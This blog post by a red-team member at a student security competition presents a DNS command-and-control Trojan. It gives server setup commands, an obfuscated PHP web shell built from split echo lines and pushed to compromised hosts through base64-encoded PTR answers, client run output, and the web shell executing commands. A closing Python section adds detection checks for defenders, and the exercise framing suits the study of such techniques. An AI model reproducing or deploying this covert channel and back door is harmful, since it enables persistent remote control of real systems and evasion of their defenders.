The competition was made up of 10 student groups (blue teams) from various colleges in the region that were tasked with protecting a mock network against a group of professional pentesters (the red team) who were trying to break in. This was my third year on the red team. Prior to the competition, I built several quick security tools that would make life easier for the red team and enable us to differentiate between the qualities of the blue teams we were attacking. I am planning to release the code that I built for the competition over the next few months in a series of blog posts.
For my first release, I would like to cover one of the command and control (C2) Trojans that I built. My goal was to have a compromised host execute commands from a red team controlled server. I built several methods to make it more difficult for the student blue teams to identify all of them. Most of the C2 Trojans that I wrote were unidirectional, meaning the compromised host would ask the red team server for commands to run and then execute them without providing output back to the red team server. This is a good technique since it makes it harder for the students to detect the traffic.
C2 Trojans can use many different applications and techniques to be effective. For example, the Trojans I wrote used the following methods: DNS, HTTP GET, HTTP POST and Twitter. In addition to my C2 Trojans, we also used several publicly available and private remote access tools (RATs), including Poison Ivy and others, to directly interact with compromised hosts. The difference is that RATs are used for direct interaction with compromised hosts, while the C2 Trojans are used to maintain persistence (add a user, add a key to the user's authorized keys file, run a back door, upload a file, etc.).
My DNS C2 Trojan contains a basic client and server. The DNS server includes a list of commands for the client/victim to run. By default, the server runs on a non-privileged port (5300) that will bind even if you do not have root permissions. The client performs reverse lookups (PTR) for several specified IPs. The server responds with a hostname, which contains a prefix that is double base64 encoded. The client decodes the hostname prefix and executes it.
The server install requires Ruby and the rubydns gem. To install Ruby, run the following command on a Linux system:

```shell
\curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby
```
Next, we need to install the rubydns gem. Do this using the following command:

```shell
gem install rubydns
```
We are now ready to build a list of tasks we would like our victims to execute. Do this by simply echoing the commands to a file:

```shell
echo -n '<?php '>>/var/www/t.php
echo -n 'sys'>>/var/www/t.php
echo -n 'tem'>>/var/www/t.php
echo -n '('>>/var/www/t.php
echo -n '$_GET'>>/var/www/t.php
echo -n '[c]'>>/var/www/t.php
echo -n ');'>>/var/www/t.php
echo -n '?>'>>/var/www/t.php
```
This will build a PHP back door on the compromised machine by echoing the lines into t.php. We need to break up the commands into multiple lines since we are using base64 encoded data and because DNS restricts the number of characters for the response. Since PHP does not care about the line breaks, this won’t be an issue at all. An alternative method would be to wget the back door or binary instead.
Now we are ready to start the server using the following command:

```shell
bash ./run_server.sh
```
This command returns the following output:

```shell
[+] Server Started on port 5300
[+] The records are:
I, [2013-04-02T13:20:08.055796 #4758]  INFO -- : Starting RubyDNS server (v0.6.1)...
I, [2013-04-02T13:20:08.055967 #4758]  INFO -- : Listening on udp:0.0.0.0:5300
```
Lastly, we are ready to run the DNS client on the compromised system. Do this by running the following command:

```shell
# ./dns_client.sh
[+] Starting Trojan
running cmd1: echo -n '<?php '>>/var/www/t.php
running cmd2: echo -n 'sys'>>/var/www/t.php
running cmd3: echo -n 'tem'>>/var/www/t.php
running cmd4: echo -n '('>>/var/www/t.php
running cmd5: echo -n '$_GET'>>/var/www/t.php
running cmd6: echo -n '[c]'>>/var/www/t.php
running cmd7: echo -n ');'>>/var/www/t.php
running cmd8: echo -n '?>'>>/var/www/t.php
[+] Trojan Complete!
```
We can confirm everything worked by browsing to http://VICTIM_IP/t.php?c=id, which will run the "id" command we passed via the "c" argument to our webshell back door.

```shell
$ curl http://127.0.0.1/t.php?c=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
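For the blue teams reading along, here is an added example (my own Python, not part of the original post or of the Quick C2 DNS Trojan's code) that mirrors the scheme described above, a command double base64 encoded into the first label of a PTR answer, and applies the three checks a defender can run over captured DNS responses: DNS traffic to a port other than 53, a long base64-looking first label, and a label that decodes twice into printable text. The exact encoding layout is assumed from the description, the 63-byte label limit is the RFC 1035 limit behind the line splitting, and the sample records are constructed.

```python
import base64
import re
import string

BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
MAX_LABEL = 63  # RFC 1035 limit per DNS label; why the post splits the command

def encode_command(cmd: str) -> str:
    """Mirror of the post's scheme (assumed): base64 twice, used as the first label."""
    label = base64.b64encode(base64.b64encode(cmd.encode())).decode()
    if len(label) > MAX_LABEL:
        raise ValueError(f"{len(label)}-byte label exceeds the {MAX_LABEL}-byte limit")
    return label

def decode_label(label: str):
    """Undo two base64 layers; return text only if it is printable ASCII, else None."""
    try:
        inner = base64.b64decode(label, validate=True)
        text = base64.b64decode(inner, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    if not text or not all(ch in string.printable for ch in text):
        return None
    return text

def analyse_ptr_answer(server_port: int, answer: str) -> list:
    """Detection tags for one PTR response; answer is the hostname returned."""
    tags = []
    if server_port != 53:
        tags.append("dns-to-nonstandard-port")  # the post's server listens on 5300
    label = answer.split(".")[0]
    if BASE64_LABEL.match(label):
        tags.append("base64-looking-label")
    cmd = decode_label(label)
    if cmd is not None:
        tags.append("double-base64-decodes-to-text:" + cmd)
    return tags

# Constructed sample records: (server port, PTR answer), one carrying a task.
SAMPLE = [
    (53, "ec2-54-1-2-3.compute-1.amazonaws.com"),
    (53, "mail.example.net"),
    (5300, encode_command("echo -n 'sys'>>/var/www/t.php") + ".example.com"),
]

def scan(records=SAMPLE):
    return [(answer, analyse_ptr_answer(port, answer)) for port, answer in records]
```

Only the third record is tagged; the first two are ordinary PTR answers and fall through every check.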
Simple right? Let me know if you have any questions or comments about the Quick C2 DNS Trojan.
I code things that hack all the things. If you do too, let me know—I’m hiring!